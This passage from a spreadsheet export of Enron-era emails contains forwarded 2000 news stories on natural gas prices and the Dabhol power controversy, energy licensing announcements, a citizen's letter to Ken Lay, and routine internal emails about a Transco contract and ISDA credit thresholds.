generate higher gross profits than could be realized from selling the _x000D_
products manufactured with the natural gas," said Michael L. Bennett, Terra _x000D_
executive vice president and chief operating officer. _x000D_
On Nov. 30, Terra said it was closing its Beaumont plant because it couldn't _x000D_
make a profit at current gas prices. _x000D_
Terra said then that its production costs would exceed selling prices when _x000D_
natural gas prices climbed above $6. When the decision was announced Nov. 30, _x000D_
NYMEX gas prices closed at $6.673 an MBtu. Since then, the prices have risen _x000D_
nearly $3. _x000D_
Terra said it would re-evaluate the situation toward the end of December. _x000D_
Mississippi Chemical said it was selling all of its futures contracts for _x000D_
natural gas to lock in the current prices. It said it would post a $16 _x000D_
million pre-tax gain by selling the gas contracts. _x000D_
The company's president and chief executive officer, Charles O. Dunn, said _x000D_
selling the natural gas was in Mississippi Chemical's "best interests." _x000D_
"We remain committed to the nitrogen business and our customers, but we also _x000D_
have to take advantage of opportunities to optimize cash flow during these _x000D_
challenging times," Mr. Dunn said. "It is our belief that the current _x000D_
unprecedented natural gas prices are unlikely to be sustained during the _x000D_
intermediate term." _x000D_
Seneca Resources, based in Buffalo, N.Y., said Monday it would sell the _x000D_
natural gas it had been using for its steam injection project at a California _x000D_
oil field. It expects to post a pre-tax profit of about $31,000 a month, it _x000D_
said. _x000D_
"In light of the current natural gas shortage in California, we felt it was _x000D_
important to curtail our steaming operations and allow that gas to be used to _x000D_
heat homes and generate electricity," Seneca president James Beck said. _x000D_
In at least one case, high electricity prices have induced a company to sell _x000D_
off the electricity for which it has contracted rather than continue _x000D_
operations. _x000D_
On Sunday, Kaiser Aluminum &amp; Chemical Corp. said it would close its Pacific _x000D_
Northwest smelters until at least Oct. 1, 2001, and was selling the _x000D_
electricity those plants would have used. _x000D_
Although it must pay laid-off employees a portion of their salaries, the _x000D_
power sales from December alone will bring Kaiser $52 million. _x000D_
Mr. Shorter of TXU and Mark Palmer, spokesman for Houston energy company _x000D_
Enron Corp., said the arrival of cold weather and the sharply higher natural _x000D_
gas prices have brought more companies to their doors asking for help in _x000D_
managing their energy costs. _x000D_
"Volatility is good for us," Mr. Palmer said. _x000D_
Mr. Shorter said the price of natural gas has justified a switch from natural _x000D_
gas to fuel oil for a number of their customers. _x000D_
Supplies of natural gas have remained adequate, but companies that didn't _x000D_
prepare for winter energy costs will feel a financial hit, Mr. Shorter said. _x000D_
"You're going to see a real economic strain in a lot of geographic regions -- _x000D_
if not nationally -- on the economic viability of a lot of these companies" _x000D_
that had no program to manage energy risks or had plans that were _x000D_
"ill-advised or improperly timed," he said. _x000D_
Terra senior vice president Mark Rosenbury said Monday the company will look _x000D_
at gas prices between Christmas and New Year's to see if it can profitably _x000D_
buy natural gas and reopen the shuttered plants. _x000D_
Mr. Rosenbury said he sees the current spike in natural gas prices as "an _x000D_
aberration" and expects prices to fall to historical norms of $2 to $3 fairly _x000D_
soon. _x000D_
"Maybe it's longer than I think. But the cost of finding, producing and _x000D_
selling natural gas doesn't command the price it's at today," he said._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
Activate ''Year-In-Review'' Factsheet_x000D_
_x000D_
12/12/2000_x000D_
Business Wire_x000D_
(Copyright (c) 2000, Business Wire)_x000D_
_x000D_
SEATTLE--(BUSINESS WIRE)--Dec. 12, 2000--Activate emerged as a leading _x000D_
digital media services company, Webcasting a record number of live events and _x000D_
winning two industry awards to cap a year of dramatic growth. _x000D_
A majority-owned operating company of CMGI, Activate's business has grown _x000D_
15-30X across all key metrics, both in volume and scope of work. Over 8,000 _x000D_
businesses employed Activate's broad range of digital media services, _x000D_
including production and distribution of online live and on-demand events for _x000D_
both business communications and consumer events. In addition, Activate _x000D_
experienced over 100 million streams in 2000._x000D_
"This has been quite a year for Activate," said Jeff Schrock, CEO and founder _x000D_
of Activate. "We've been fortunate to be involved in this industry from the _x000D_
very beginning and it has been exciting to see the digital media explosion _x000D_
over the last year. Activate's goal continues to be providing our customers _x000D_
with high-quality, cost-effective digital media solutions and we were _x000D_
fortunate to end the year on a high note, receiving two industry awards from _x000D_
Computerworld and Network World for our network performance and service _x000D_
offerings." _x000D_
_x000D_
Notable Activate milestones for 2000 include... _x000D_
_x000D_
NETWORK _x000D_
_x000D_
-- Recognizing the broadband evolution, Activate focused on key _x000D_
network innovations, including cell-based server architecture. _x000D_
Activate's advanced network boosts bandwidth efficiency, _x000D_
increasing the company's peak capacity and refining Activate's _x000D_
load balancing and caching techniques. These enhancements _x000D_
contributed to Activate's Blue Ribbon win in Network World's _x000D_
Streaming Media Review, beating Akamai, iBeam and Digital _x000D_
Island. _x000D_
_x000D_
-- Coordination and cross-connection with other content _x000D_
distribution networks (CDNs), including Mirror Image, Enron, _x000D_
Digital Island, and AT&amp;T. These skills led to a significant _x000D_
role in MSN's multi-network Webcast of Madonna's London _x000D_
concert, which was produced by sister company Navisite. _x000D_
_x000D_
AUDIENCE REACH _x000D_
_x000D_
-- With over 40,000 Webcasts in 2000, Activate streamed more live _x000D_
events than any other service provider, including Akamai, _x000D_
iBeam and Digital Island. Live events ranged from concerts for _x000D_
the Backstreet Boys and corporate announcements for Compaq, _x000D_
Amway and Microsoft to Seattle Seahawks game Webcasts and a _x000D_
political rally for Ralph Nader. _x000D_
_x000D_
-- Activate experienced new peaks in bits-per-second simultaneous _x000D_
transmission, total simultaneous viewers and total bytes _x000D_
transferred. These peaks resulted from combined audiences of _x000D_
hundreds of simultaneous events during Activate's highest _x000D_
traffic periods, averaging over 25 million streams per _x000D_
quarter. _x000D_
_x000D_
-- Acknowledging the impact of the World Wide Web, Activate _x000D_
partnered with European streaming media provider Unit.net to _x000D_
ensure global reach. _x000D_
_x000D_
BUSINESS EXPANSION _x000D_
_x000D_
-- Activate expanded into a 60,000 square foot production and _x000D_
operations center in Seattle, and additional operational and _x000D_
sales locations in New York, San Francisco, Los Angeles, _x000D_
Boston and Chicago. This growth complements the continued _x000D_
growth of Toronto-based Activate Canada, the leading streaming _x000D_
media provider in the Canadian market. _x000D_
_x000D_
INDUSTRY REACH _x000D_
_x000D_
-- Financial: Since Regulation FD went into effect, Activate _x000D_
established a 75 percent market share in the financial space, _x000D_
broadcasting nearly 4,000 earnings calls in the third quarter. _x000D_
_x000D_
-- Entertainment: Activate's digital media solutions were a _x000D_
breakthrough hit with the entertainment industry, including _x000D_
partnerships with BMG, MTVi and Miramax. From pop and rock to _x000D_
jazz and hip-hop, Activate provided digital media services for _x000D_
today's hottest artists including Jay-Z, P!NK and Christina _x000D_
Aguliera. _x000D_
_x000D_
-- Advertising: Activate partnered with AdForce and Engage to _x000D_
expand streaming advertising, developing live and on-demand ad _x000D_
insertion solutions. _x000D_
_x000D_
About Activate _x000D_
_x000D_
Activate is a leading digital media infrastructure services company. _x000D_
Activate's services include: event Webcasting for business communications and _x000D_
consumer live events, live 24x7 Webcasting for radio, TV and Internet-only _x000D_
programming, and on-demand Webcasting of audio and video content to enhance _x000D_
any Web site. Major clients include Microsoft, Dell, Unocal, AIMR, _x000D_
Rivals.com, National Public Radio, and CTV Sportsnet.com. Activate received _x000D_
the Blue Ribbon award from Network World's Streaming Media Review and has _x000D_
been named by Computerworld as one of the top 100 emerging companies to watch _x000D_
in 2001. A majority owned operating company of CMGI, Inc., Activate is based _x000D_
in Seattle with offices in New York, San Francisco and Toronto. For more _x000D_
information about the company or its services, please visit www.activate.net _x000D_
or call 206/830-5300._x000D_
_x000D_
_x000D_
CONTACT: Activate Brooke Davis, 206/830-5716 brooked@activate.net or The _x000D_
Weber Group Rachel Dressler, 503/552-3742 rdressler@webergroup.com _x000D_
07:01 EST DECEMBER 12, 2000 _x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
Enron Sheds No Light on Consumer_x000D_
DARRYL D'MONTE_x000D_
_x000D_
12/12/2000_x000D_
The Times of India_x000D_
Copyright (C) 2000 The Times of India; Source: World Reporter (TM)_x000D_
_x000D_
BY any reckoning, the ongoing controversy over the price of electricity _x000D_
produced by the US multinational, Enron, in Maharashtra, demonstrates how the _x000D_
power elite in this country has been guilty of waiving all normal checks and _x000D_
balances in its haste to favour this single producer. Indeed, as Abhay Mehta, _x000D_
the author of the incisive expose of the project titled Power Play says, _x000D_
there is little point berating the American company for taking us for a ride _x000D_
when politicians from parties across the spectrum and a galaxy of bureaucrats _x000D_
and public agencies vied with each other in rolling out the red carpet. _x000D_
Maharashtra energy minister Padamsinh Patil has now contradicted his _x000D_
coalition chief minister's assurance that the second phase of the project _x000D_
would be reviewed. This is not the customary double-talk of politicians but _x000D_
the tacit acknowledgement that Mr Patil's National Congress Party mentor _x000D_
Sharad Pawar was responsible as chief minister for pushing through Enron's _x000D_
first phase despite countless objections to what is simply the biggest _x000D_
purchase contract in India's history and one of the largest in the world. In _x000D_
1993, Mr Pawar went on record that issues such as the import of fuel, total _x000D_
foreign exchange outgo and presumably the power tariff were minor issues to _x000D_
be clarified and that the Foreign Investment Promotion Board would take a _x000D_
decision on them at the time of final review._x000D_
These are precisely the issues that are coming home to roost. With the _x000D_
built-in escalation clauses in the infamous power purchase agreement, which _x000D_
permits increases in tariffs with a hike in the dollar exchange rate among _x000D_
other factors, the price of power is now over Rs 7 per unit and it is certain _x000D_
to rise further. This will impose a crippling burden on consumers not only _x000D_
householders but, ironically enough, industries, negating the very economic _x000D_
growth that private producers like Enron were supposed to foster. When Mr _x000D_
Pawar capitulated to virtually every demand of the US company, the capital _x000D_
cost was already over twice that of comparable projects elsewhere in the _x000D_
world. _x000D_
Although Enron is often described as one of the world's leading power _x000D_
companies, it is mainly engaged in distributing gas. In 1993, only one per _x000D_
cent of its revenue was earned on producing power. Its use of imported _x000D_
liquefied natural gas as fuel for the Dabhol plant was some four times more _x000D_
expensive than coal, of which India has an abundance. The World Bank, itself _x000D_
an ardent votary of privatisation, criticised the project on several grounds. _x000D_
Since it would amount to one-fifth of the Maharashtra State Electricity _x000D_
Board's capacity, it was likely to have an adverse financial impact, the Bank _x000D_
stated. Consumers would not be willing to pay such a high price and it _x000D_
concluded, on economic grounds, that the project was not viable. The Central _x000D_
Electricity Authority (CEA) also pointed out that the project departed from _x000D_
the norm, especially in denominating prices in US dollars. However, Mr Pawar _x000D_
decided to bypass the CEA and overcome the objections of the World Bank and _x000D_
others. _x000D_
At the time, the opposition parties in Maharashtra, the BJP and Shiv Sena, _x000D_
accused Mr Pawar of corruption in shepherding the project through. Mr _x000D_
Gopinath Munde of the BJP made his famous boast that they would throw the _x000D_
project in the Arabian sea. When they came to power in 1995, they appointed a _x000D_
committee to examine whether the project served the state's interests. The _x000D_
committee accused the previous government of committing a grave impropriety _x000D_
under circumstances which made the Enron/MSEB arrangement on Dabhol lack _x000D_
transparency. It came to the irresistible conclusion that several unseen _x000D_
factors and forces seem to have worked to get Enron what it wanted. On this _x000D_
basis, the state government cancelled the first and second phases. _x000D_
The cancellation raised several protests. Manmohan Singh claimed that it _x000D_
could not be done. Then US ambassador Frank Wisner warned of the consequences _x000D_
(he joined Enron as a director the very day after he finished his stint in _x000D_
India). However, the redoubtable Rebecca Mark of Enron flew down to meet Bal _x000D_
Thackeray, the self-proclaimed remote control of the BJP-SS coalition, for a _x000D_
second time. On this occasion, she must have used her considerable persuasive _x000D_
powers to convince the Sena leader to backtrack on the cancellation and the _x000D_
government announced renegotiations. _x000D_
The total payments to Enron under the new agreement was a staggering $35 _x000D_
billion over the project's lifetime and in a blatant misrepresentation, the _x000D_
government claimed it had lowered the tariff. The final straw was in May 1996 _x000D_
when Mr Vajpayee's 13-day minority government ratified the Centre's _x000D_
counter-guarantee to Enron on its very last day in office. When the CITU and _x000D_
Abhay Mehta filed a public interest petition in the Mumbai high court against _x000D_
the project, the arguments given by Enron's lawyers and those representing _x000D_
the government were tendentious to the point of being farcical. Chief _x000D_
minister Manohar Joshi filed an affidavit to make out that his government's _x000D_
earlier allegations of fraud were made on the basis of newspaper reports. _x000D_
Enron got its way and the project went on stream. _x000D_
Even granting that several states were bending over backwards to attract _x000D_
foreign investment in the early nineties, the concessions which were extended _x000D_
to Enron were not merely extravagant but unconstitutional. The financial and _x000D_
legal guarantees committed the Indian state in a manner which no _x000D_
self-respecting country would endure. Much of the political-bureaucratic _x000D_
class connived at this subversion of the rule of law. The power purchase _x000D_
agreement in particular violated the Electricity Supply Act. The Maharashtra _x000D_
government's finance department had admitted in 1994 that if the central _x000D_
government paid the company any sums by way of its guarantee, these would be _x000D_
deducted from the state's RBI account. _x000D_
It is this unconstitutional agreement which ought to serve as the basis for _x000D_
questioning the entire Enron agreement in court. It is obvious that it is _x000D_
against the public interest and it could conceivably be demonstrated that the _x000D_
power elite has acted in its own interest and against that of the Indian _x000D_
people. There is already a precedent in Pakistan where a power purchase _x000D_
agreement with Enron which had a substantially lower cost per MW than _x000D_
Dabhol's was cancelled. Two MoUs which the Karnataka government signed with _x000D_
another US power company, Cogentrix, were also terminated._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
Enron deal can be nullified: Retd SC judge_x000D_
_x000D_
12/12/2000_x000D_
The Times of India_x000D_
Copyright (C) 2000 The Times of India; Source: World Reporter (TM)_x000D_
_x000D_
MUMBAI: Retired high court judge Hosbet Suresh has stated that the agreement _x000D_
signed between the Maharashtra State Electricity Board (MSEB) and the Dabhol _x000D_
Power Company (DPC), a subsidiary of US-based Enron, can be nullified. The _x000D_
DPC spokesperson was not available for comment. _x000D_
The state government would be within its rights to cancel the 1993 Power _x000D_
Purchase Agreement on grounds of protection of public interest, he said._x000D_
``The power that the Enron plant produces is twice as expensive as its _x000D_
nearest competitor and seven times as expensive as the cheapest electricity _x000D_
available in Maharashtra. The fixed charges, whether MSEB buys electricity or _x000D_
not, alone works out to Rs 1,000 crore a year for Phase I and nearly twice _x000D_
the amount for Phase II and the amount is to be paid for the next 40 years ! _x000D_
What public interest does it serve ?'' Mr Suresh asked in his opinion given _x000D_
to the Enron Virodhi Andolan. _x000D_
The implications of this agreement is to ``exploit'' the people, he said in _x000D_
his five-page statement, adding that ``the government has an obligation to _x000D_
end such exploitation''. _x000D_
Questioning the erstwhile Shiv Sena-BJP government's decision to withdraw the _x000D_
court case against the DPC, Mr Suresh sought to bring forth the _x000D_
inconsistencies during the alliance rule. The Sena-BJP had challenged the PPA _x000D_
declaring it as a ``fraud'' as it was not in keeping with public policy, _x000D_
consumer interest and interest of the state. ``This suit was withdrawn _x000D_
without any of the contentious issues on law and on facts being decided. The _x000D_
government renegotiated without complying any of the requirements under the _x000D_
law,'' Mr Suresh observed. _x000D_
``The concealment of relevant facts from the public, the unsatisfactory _x000D_
explanation for withdrawing the suit .... all lead to one thing namely that _x000D_
the government at no time had any regard for public welfare...,'' he said. _x000D_
Mr Suresh also pointed out to the earlier petition filed by BJP leader Ramdas _x000D_
Nayak who had challenged the contract to Enron as it was awarded without the _x000D_
process of competitive bidding. Mr Nayak's petition, however, was dismissed _x000D_
on August 19, 1994 and all subsequent petitions which sought to challenge the _x000D_
PPA were also given similar treatment, he said, adding ``without the courts _x000D_
going into he validity of the agreement''. _x000D_
``Electricity is not a matter of commerce. It is a necessity like light, _x000D_
water and air. There can be no monopoly in this. If someone wants to trade on _x000D_
these elements, he may do so provided he does not exploit the people,'' Mr _x000D_
Suresh said._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
Green Mountain Applies To Be 10th Texas Elec Supplier_x000D_
_x000D_
12/11/2000_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2000, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
HOUSTON -(Dow Jones)- Green Mountain Energy Co. said Monday it has filed an _x000D_
application with the Texas Public Utility Commission to become a retail _x000D_
electric provider when Texas launches retail electric competition Jan. 1, _x000D_
2002. _x000D_
At least nine other companies also have filed applications, but Green _x000D_
Mountain said it is the first energy company to apply for a Texas license to _x000D_
sell renewable power, such as wind, sun or hydropower._x000D_
"We are looking forward to the prospects of doing business in Texas, and we _x000D_
are excited to see regulatory rules being put in place to promote _x000D_
competition, creativity and innovation in the marketplace," said Gillan _x000D_
Taddune, Green Mountain's Texas regional manager. _x000D_
The PUC has approved one REP application from a large industrial company, but _x000D_
the Dallas-based firm, TXI Power Co., only wants to buy electricity to supply _x000D_
its own plants. _x000D_
Other non-utility companies that have filed applications to be certified as _x000D_
Texas retail electric providers, or REPs, include: Sempra Energy Solutions, a _x000D_
unit of Sempra Energy (SRE); Enron Energy Services and Enron Power Marketing, _x000D_
both units of Enron Corp., (ENE); New Power Co., formed this year by Enron, _x000D_
International Business Machines (IBM) and America Online Inc. (AOL); and _x000D_
Shell Energy Services Co., a unit of Royal Dutch/Shell Group (RD). _x000D_
Affiliates of existing Texas utilities have also filed to become REPs. _x000D_
First Choice Power, a subsidiary of TNP Enterprises Inc. has filed. TXU Corp. _x000D_
(TXU), the state's largest investor-owned utility and Reliant Energy (REI), _x000D_
the second largest, also recently filed two applications to create two REPs, _x000D_
one to sell power to large commercial and industrial customers and one to _x000D_
sell power to smaller customers. _x000D_
More companies are expected to begin the certification process in Texas _x000D_
before the end of the year as market rules are finalized. Independent _x000D_
suppliers watching the Texas market include: AES NewEnergy Inc., a unit of _x000D_
AES Corp. (AES); and Exelon Energy (EXC). _x000D_
To be certified, an entity must hold an investment grade credit rating, have _x000D_
$50 million of net worth or have cash resources of $100,000. _x000D_
REPs will be subject to PUC enforcement actions, including penalties, _x000D_
suspension and revocation for violations. _x000D_
A pilot program involving 5% of the state's power customers will begin in _x000D_
June. -By Eileen O'Grady, Dow Jones Newswires; 713-547-9213;_x000D_
eileen.ogrady@dowjones.com_x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
The New Power Company Certified As A Retail Natural Gas Marketer In Georgia_x000D_
_x000D_
12/11/2000_x000D_
PR Newswire_x000D_
(Copyright (c) 2000, PR Newswire)_x000D_
_x000D_
PURCHASE, N.Y., Dec. 11 /PRNewswire/ -- TNPC, Inc. (NYSE: NPW), parent of The _x000D_
New Power Company, the first national residential and small business energy _x000D_
provider, today announced it had received its certificate as a retail Natural _x000D_
Gas Marketer from the Georgia Public Service Commission. The New Power _x000D_
Company will begin to serve natural gas consumers in Georgia in 2001. _x000D_
The New Power Company was formed by Enron, the largest trader and marketer of _x000D_
electricity and natural gas in North America. In June, the Company acquired _x000D_
approximately 300,000 natural gas and electricity accounts in eight states _x000D_
from the Columbia Energy Group, which includes approximately 83,000 natural _x000D_
gas customers in Georgia - roughly 6 percent of the market._x000D_
The New Power Company began acquiring electricity customers in select utility _x000D_
markets in Pennsylvania and New Jersey in October 2000. In addition, the _x000D_
Co</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 09:51:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'homunculus_2001@yahoo.com'})</t>
  </si>
  <si>
    <t>Alex Pieske_x000D_
1012 Northwestern Drive_x000D_
Grand Forks, ND 58203_x000D_
homunculus_2001@yahoo.com_x000D_
_x000D_
To Mr. Ken Lay,_x000D_
_x000D_
I'm writing to urge you to donate the millions of dollars you made from selling Enron stock before the company declared bankruptcy to funds, such as Enron Employee Transition Fund and REACH, that benefit the company's employees, who lost their retirement savings, and provide relief to low-income consumers in California, who can't afford to pay their energy bills.  Enron and you made millions out of the pocketbooks of California consumers and from the efforts of your employees._x000D_
_x000D_
Indeed, while you netted well over a $100 million, many of Enron's employees were financially devastated when the company declared bankruptcy and their retirement plans were wiped out.  And Enron made an astronomical profit during the California energy crisis last year.  As a result, there are thousands of consumers who are unable to pay their basic energy bills and the largest utility in the state is bankrupt._x000D_
_x000D_
The New York Times reported that you sold $101 million worth of Enron stock while aggressively urging the company's employees to keep buying it.  Please donate this money to the funds set up to help repair the lives of those Americans hurt by Enron's underhanded dealings._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Alex Pieske_x000D_
_x000D_
Alex Pieske</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 02:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Invitation from Dean Laura Tyson</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Haas Student: _x000D_
_x000D_
New York Venture Capitalist Alan J. Patricof will be at the Haas School on _x000D_
Wednesday November 29, 2000 to participate in the 2000-2001 Haas Business _x000D_
Faculty Research Dialogue: Shakeout in Cyberspace--What's Next for the Dot _x000D_
Coms? The Business Faculty Research Dialogues are sponsored by the Clausen _x000D_
Center for International Business and Policy and California Management _x000D_
Review. _x000D_
_x000D_
Founded in 1969 by Alan Patricof, Patricof &amp; Co. has helped start a number of _x000D_
major companies, including Apple Computer, AOL, Office Depot and bigchalk.com _x000D_
The firm manages over $7.0 billion on behalf of institutional investors in _x000D_
the US and abroad. Mr. Patricof will speak in the Haas School's Wells Fargo _x000D_
Room at 12:30 p.m. on Wednesday November 29, 2000. Refreshments will be _x000D_
available in the Wells Fargo Room starting at 12:00 p.m. _x000D_
_x000D_
Please contact Ms. Meredith LaCorte in the dean's office if you will be able _x000D_
to join us for the program. She can be reached at 510-643-2027 or in email at _x000D_
lacorte@haas.berkeley.edu. _x000D_
_x000D_
_x000D_
Sincerely, _x000D_
_x000D_
_x000D_
Laura D'Andrea Tyson _x000D_
Dean </t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 13:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CBI's Business to Business Energy Conference Series</t>
  </si>
  <si>
    <t>[IMAGE]_x000D_
_x000D_
CBI's Business to Business Energy Conference Series_x000D_
http://www.cbinet.com/wconnect/wc.dll?CBEvent~ListEvents~SECTOR~POW~Energy~=_x000D_
Eve_x000D_
nts_x000D_
CBI=01,s 2000 - 2001 conference series schedule is as follows:=09_x000D_
Latin American Oil &amp; Gas 2000?=20_x000D_
December 7 - 8, 2000_x000D_
Houston, TX=09_x000D_
5th Annual Private Energy in Turkey=20_x000D_
December 11 - 12, 2000_x000D_
Washington, DC=09_x000D_
3rd The Business Case for Fuel Cells=20_x000D_
December 11 - 12, 2000_x000D_
Miami, FL=09_x000D_
5th Annual Merchant Power Plants=20_x000D_
January 18 - 19, 2001_x000D_
Houston, TX=09_x000D_
Private Power in the Caribbean?=20_x000D_
January 29 - 30, 2001_x000D_
Miami, FL=09_x000D_
3rd Annual Electric Asset Valuation=20_x000D_
February 22 - 23, 2001_x000D_
San Antonio, TX=09_x000D_
Electric Distribution Reliability=20_x000D_
February 26 - 27, 2001_x000D_
Houston, TX=09_x000D_
Brazil Energy 2001=20_x000D_
March 22 - 23, 2001_x000D_
Miami, FL=09_x000D_
=09?? Are you a market leader or looking to become one?? If you are seeking=_x000D_
=20_x000D_
realistic, well-defined action plans for maximizing bottom-line impact, the=_x000D_
n=20_x000D_
CBI=01,s business to business conferences are a must-attend for you and you=_x000D_
r=20_x000D_
colleagues.? The Center for Business Intelligence, a leading conference=20_x000D_
company, has put together a complete schedule of high-level conferences for=_x000D_
=20_x000D_
executive decision-makers, who face strategic issues in domestic and=20_x000D_
international markets.? This notice is brought to you by=20_x000D_
worldenergyonline.com, your link to worldwide energy activity.? Visit them=_x000D_
=20_x000D_
today at www.worldenergyonline.com_x000D_
=09_x000D_
=09?_x000D_
=09_x000D_
=09=01&amp;This conference was not only rich in information from the region, bu=_x000D_
t the=20_x000D_
world-level networking was outstanding.=018_x000D_
=09_x000D_
=09?????? -Rafael Sequeira_x000D_
=09???????? National Energy &amp; Infrastructure Advisor, Government of Costa=_x000D_
=20_x000D_
Rica????? ???????????_x000D_
=09_x000D_
=09CBI brings together top decision-makers who share their insight and=20_x000D_
experience with you. Don't miss this one of a kind opportunity to network=_x000D_
=20_x000D_
with senior policy makers and industry leaders._x000D_
=09_x000D_
=09For more information on these conferences, documentation binders or to=_x000D_
=20_x000D_
register, contact Luci Santillo at 800-817-8601 (outside the US call=20_x000D_
781-939-2412), e-mail l.santillo@cbinet.com or visit our website at=20_x000D_
www.cbinet.com ?_x000D_
=09_x000D_
=09?_x000D_
=09_x000D_
=09?_x000D_
=09_x000D_
=09To be removed from future mailings of this nature, please REPLY to this=_x000D_
=20_x000D_
message and type REMOVE in the subject line.0000038188</t>
  </si>
  <si>
    <t>Tue, 1 Aug 2000 01:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Pacific Gas &amp; Electric Company</t>
  </si>
  <si>
    <t xml:space="preserve">We are not trading with them_x000D_
_x000D_
_x000D_
From: Tana Jones@ECT on 31-07-2000 02:48 CDT_x000D_
To: Alan Aronowitz/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Stacy E _x000D_
Dickson/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT, Harry M Collins/HOU/ECT@ECT, _x000D_
David Portz/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marie Heard/Enron _x000D_
Communications@Enron Communications, Robbi Rossi/Enron Communications@Enron _x000D_
Communications_x000D_
cc:  _x000D_
_x000D_
Subject: Pacific Gas &amp; Electric Company_x000D_
_x000D_
I need to hear back from anyone whose group may be trading with this _x000D_
counterparty.  Here's my issue._x000D_
_x000D_
We have been negotiating an amendment to the Password Application with this _x000D_
counterparty.  The absolutely refuse to see a GTC.  I don't know if any of _x000D_
you are trading gas, crude or power with them, but if you are, do you have a _x000D_
master, or would the counterparty see a GTC.  I'm trying to figure out what _x000D_
we have before we talk to them._x000D_
_x000D_
Thanks!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Jan 2000 10:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: New Transco contract</t>
  </si>
  <si>
    <t xml:space="preserve">This is in Sitara._x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 01/12/2000 06:53 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Sylvia A Campos_x000D_
01/12/2000 02:06 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Beverly Beaty/HOU/ECT@ECT _x000D_
Subject: Re: New Transco contract  _x000D_
_x000D_
Transco contract 3.2846 is set up in Global._x000D_
_x000D_
Sylvia_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
01/12/2000 01:45 PM_x000D_
To: Sylvia A Campos/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: New Transco contract  _x000D_
_x000D_
Opps -   3.2846_x000D_
_x000D_
_x000D_
_x000D_
Sylvia A Campos_x000D_
01/12/2000 01:41 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: New Transco contract  _x000D_
_x000D_
Chris,_x000D_
What is the contract no.?_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
01/12/2000 01:32 PM_x000D_
To: Sylvia A Campos/HOU/ECT@ECT, Linda S Bryan/HOU/ECT@ECT_x000D_
cc: Beverly Beaty/HOU/ECT@ECT _x000D_
Subject: New Transco contract_x000D_
_x000D_
Please set up the following contract _x000D_
_x000D_
Shipper  Columbia Energy Services_x000D_
Agent  ENA_x000D_
Pipe  Transco_x000D_
Firmness IT _x000D_
Service Type Transortation_x000D_
Rate Sched IT_x000D_
_x000D_
Term  1/1/2000 - 1/31/2000 then evergreen._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 13 May 2001 06:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'makkawi@torys.com'})</t>
  </si>
  <si>
    <t>frozenset({'stepvezi@energiemaclaren.com', 'ginebert@energiemaclaren.com', 'carol.st.clair@enron.com'})</t>
  </si>
  <si>
    <t>RE: Maclaren ISDA</t>
  </si>
  <si>
    <t>Hi Carol,_x000D_
_x000D_
I spoke to Ginette Berthel at Maclaren Energy, regarding your e-mail._x000D_
_x000D_
Regarding point #2 below, Maclaren would like its cross default threshold_x000D_
amount to be US $50 million.  They are fine with the Enron threshold being_x000D_
at US $100 million._x000D_
_x000D_
Regarding the CSA, since Great Lakes Power is giving a $12 million parental_x000D_
guarantee, the collateral threshold amount for Maclaren should be $12_x000D_
million.  Your e-mail below states that Enron' parent will be giving a $30_x000D_
million parental guarantee.  My understanding is that this guarantee was to_x000D_
be $15 million.  Regardless, I believe that Maclaren is only willing to_x000D_
accept $15 million of credit risk from both Enron entities.  Therefore, the_x000D_
threshold amount should be $15 million._x000D_
_x000D_
Please e-mail or call me to discuss._x000D_
_x000D_
Regards,_x000D_
Michael Akkawi_x000D_
416-865-8122_x000D_
_x000D_
-----Original Message-----_x000D_
From: Carol.St.Clair@enron.com [mailto:Carol.St.Clair@enron.com]_x000D_
Sent: Tuesday, May 01, 2001 1:55 PM_x000D_
To: makkawi@torys.com_x000D_
Cc: Stephanie.Panus@enron.com; Edward.Sacks@enron.com_x000D_
Subject: Maclaren ISDA_x000D_
_x000D_
_x000D_
Michael:_x000D_
I spoke with Ed Sacks, our credit person, and here is a summary of where we_x000D_
stand on responding to your mark-up:_x000D_
_x000D_
1.   Rider 1 is okay._x000D_
2.   No change will be made to the Threshold Amount._x000D_
3.   Early Termination Payments will be calculated using the Loss Method as_x000D_
this is Enron's current policy._x000D_
4.   Riders 2, 3 and 4 and your changes to pages 2 and 9 of the ISDA_x000D_
Schedule are okay._x000D_
No chnages to the CSA Schedule will be made._x000D_
_x000D_
With respect to the Guarantys, we have received the Great Lakes $12 million_x000D_
Guaranty and Enron's Guaranty will be amended to increase the cap to $30_x000D_
million and we will add your language._x000D_
_x000D_
Please confirm that all of this is okay with Maclaren._x000D_
